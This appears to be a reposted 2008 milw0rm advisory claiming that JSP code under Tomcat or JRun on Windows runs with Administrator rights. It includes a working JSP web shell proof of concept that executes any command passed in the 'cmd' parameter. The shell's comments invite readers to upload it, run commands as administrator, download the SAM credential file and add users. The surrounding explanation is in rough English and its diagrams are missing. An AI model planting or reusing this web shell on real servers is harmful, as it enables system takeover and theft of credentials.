Tomcat & Jrun Privilege Escalation (Windows)

In the name of God.

Hello my friend & all readers  ,

Tomcat [jsp]  &  Jrun  [ColdFusion] & some HTTP server , when called “JSP” function in windows , Attackers can  Privilege Escalation .

This bug Emanate from differ Kernel in windows and Linux .

Example Vulnerable Software : “PLESK” or many of web management systems  Used them , you can find them .

TOMCAT : [http://tomcat.apache.org/]

Jrun : [http://www.adobe.com/products/jrun/]

Diagram of Run  web Application In windows [ Attention in user mode & kernel Mode ] :

.

.

Diagram of Run  web Application In Linux [ Attention in user mode & kernel Mode ] :

.

.

Please Attention to diragrams , I don’t mean describe win & lin kernel , But you see , in windows services security & Application Security  are in user mode & you are not face to face with kernel  , But in  linux we have a different Calling Services & user access .

when “JSP” web application Run in Linux [ with tomcat  or other Server ] , You can use Privilege of owner [runner] user . but , when you run This in  windows [TOMCAT or Jrun web server ]   ,  “JSP” Application take jrun or tomcat Access .

They have Administrator Access . Therefor You have Admin level process.

use [getRuntime().exec] Function in [JSP] you can run Process .

This is a test  . [Detail]

import java.io.IOException;Runtime.getRuntime().exec("\"c:/program files/windows/notepad.exe\"");
here is one of published PoC For this vulnerabilities

we can run it , [abysssec.jsp] -> :

< %@ page import="java.util.*,java.io.*"%>
< %
%>

< %--
abysssec inc public material

just upload this file with abysssec.jsp and execute your command
your command will run as administrator . you can download sam file
add user or do anything you want .
note : please be gentle and don't obstructionism .
vulnerability discovered by : abysssec.com

--%>

Abysssec inc (abysssec.com) JSP vulnerability<br /> <center><br /> <h3>JSP Privilege Escalation Vulnerability PoC</h3> <p></center></p> <form METHOD="GET" NAME="myform" ACTION=""> <input TYPE="text" NAME="cmd"/> <input TYPE="submit" VALUE="Execute !"/> </form> <pre> < % if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + ""); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> </pre> <p>

# milw0rm.com [2008-11-28]


			

Comments are closed.

Get Adobe Flash playerPlugin by wpburn.com wordpress themes